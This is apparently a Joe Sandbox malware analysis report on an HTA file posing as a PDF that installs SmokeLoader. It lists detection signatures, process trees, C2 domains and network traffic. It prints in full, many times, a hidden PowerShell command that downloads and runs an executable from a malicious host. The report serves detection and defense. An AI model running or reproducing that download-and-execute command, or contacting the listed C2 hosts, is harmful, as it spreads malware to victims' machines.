Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3388.PDF.hta

Overview

General Information

Sample name:3388.PDF.hta
renamed because original name is a hash value
Original sample name:_011024_i_01_10_2024___UA973248410000000026006263388.PDF.hta
Analysis ID:1524029
MD5:35ef7b98b8eabb06a41f4b0cecace704
SHA1:5668a7317fb91f8be783ff93289dad41d5ea6108
SHA256:c40dff83b1bb399b942ba22b7d03be530e35a04d9e0862789efada5896cd7eb6
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • mshta.exe (PID: 3564 cmdline: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 3612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • EkXH.exe (PID: 3824 cmdline: "C:\Users\user\AppData\Local\Temp\EkXH.exe" MD5: 31059E7394B880F017E83804D9B716AB)
        • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • taskeng.exe (PID: 3956 cmdline: taskeng.exe {A18241FA-0367-40E9-BBC3-15CE4DAD052A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • vgjfftu (PID: 3988 cmdline: C:\Users\user\AppData\Roaming\vgjfftu MD5: 31059E7394B880F017E83804D9B716AB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x254:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x32e9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    Click to see the 7 entries

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3564, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", ProcessId: 3612, ProcessName: powershell.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3564, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", ProcessId: 3612, ProcessName: powershell.exe
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vgjfftu, CommandLine: C:\Users\user\AppData\Roaming\vgjfftu, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vgjfftu, NewProcessName: C:\Users\user\AppData\Roaming\vgjfftu, OriginalFileName: C:\Users\user\AppData\Roaming\vgjfftu, ParentCommandLine: taskeng.exe {A18241FA-0367-40E9-BBC3-15CE4DAD052A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 3956, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\vgjfftu, ProcessId: 3988, ProcessName: vgjfftu
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3564, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", ProcessId: 3612, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3564, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", ProcessId: 3612, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3564, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", ProcessId: 3612, ProcessName: powershell.exe
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Local\Temp\3whyeuor.ju0.ps1

    Data Obfuscation

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\3388.PDF.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3564, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path", ProcessId: 3612, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-02T12:25:57.550656+020020391031A Network Trojan was detected192.168.2.2249162185.219.7.20480TCP
    2024-10-02T12:27:08.805485+020020391031A Network Trojan was detected192.168.2.2249163185.219.7.20480TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-02T12:25:20.716931+020020197142Potentially Bad Traffic192.168.2.2249161185.219.7.20480TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\user\AppData\Roaming\vgjfftuAvira: detection malicious, Label: HEUR/AGEN.1312567
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
    Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
    Source: unicexpertmagazine.pwVirustotal: Detection: 9%Perma Link
    Source: http://ukr-net-filesrever.pw/download/svc.exeVirustotal: Detection: 6%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeVirustotal: Detection: 36%Perma Link
    Source: C:\Users\user\AppData\Roaming\vgjfftuVirustotal: Detection: 36%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Source: C:\Users\user\AppData\Roaming\vgjfftuJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49162 -> 185.219.7.204:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49163 -> 185.219.7.204:80
    Source: C:\Windows\explorer.exeDomain query: openclehardware.ru
    Source: C:\Windows\explorer.exeDomain query: ceoconstractionstore.pl
    Source: C:\Windows\explorer.exeDomain query: unicexpertmagazine.pw
    Source: C:\Windows\explorer.exeDomain query: informcoopirationunicolceo.ru
    Source: C:\Windows\explorer.exeNetwork Connect: 185.219.7.204 80Jump to behavior
    Source: Malware configuration extractorURLs: http://unicexpertmagazine.pw/index.php
    Source: Malware configuration extractorURLs: http://ceoconstractionstore.pl/index.php
    Source: Malware configuration extractorURLs: http://openclehardware.ru/index.php
    Source: Malware configuration extractorURLs: http://informcoopirationunicolceo.ru/index.php
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Wed, 02 Oct 2024 10:25:20 GMTContent-Type: application/x-msdos-programContent-Length: 222720Connection: closeLast-Modified: Wed, 02 Oct 2024 05:06:08 GMTETag: "36600-62377654eb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 a7 01 00 50 00 00 00 00 50 11 00 e0 a1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a4 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 7e 01 00 00 10 00 00 00 80 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 20 00 00 00 90 01 00 00 22 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 7f 0f 00 00 c0 01 00 00 18 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 40 11 00 00 06 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 a1 01 00 00 50 11 00 00 a2 01 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: ukr-net-filesrever.pwConnection: Keep-Alive
    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 185.219.7.204:80
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://navjbpyetuaao.org/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: unicexpertmagazine.pw
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kwbsyhfpuedti.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: unicexpertmagazine.pw
    Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: ukr-net-filesrever.pwConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ukr-net-filesrever.pw
    Source: global trafficDNS traffic detected: DNS query: unicexpertmagazine.pw
    Source: global trafficDNS traffic detected: DNS query: ceoconstractionstore.pl
    Source: global trafficDNS traffic detected: DNS query: openclehardware.ru
    Source: global trafficDNS traffic detected: DNS query: informcoopirationunicolceo.ru
    Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://navjbpyetuaao.org/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: unicexpertmagazine.pw
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 02 Oct 2024 10:25:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
    Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.392682461.0000000002911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.392682461.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.392682461.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.392682461.0000000002BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ukr-net-filesrever.pw
    Source: powershell.exe, 00000001.00000002.390878362.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ukr-net-filesrever.pw/download/svc.exe
    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
    Source: explorer.exe, 00000005.00000000.405597987.0000000003B98000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
    Source: 3388.PDF.htaString found in binary or memory: http://www.pgdp.net
    Source: explorer.exe, 00000005.00000000.405739079.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.406299609.0000000007902000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.405400637.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
    Source: explorer.exe, 00000005.00000000.405739079.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.406299609.0000000007902000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.405400637.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
    Source: explorer.exe, 00000005.00000000.405400637.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
    Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000001.00000002.395989011.0000000003939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
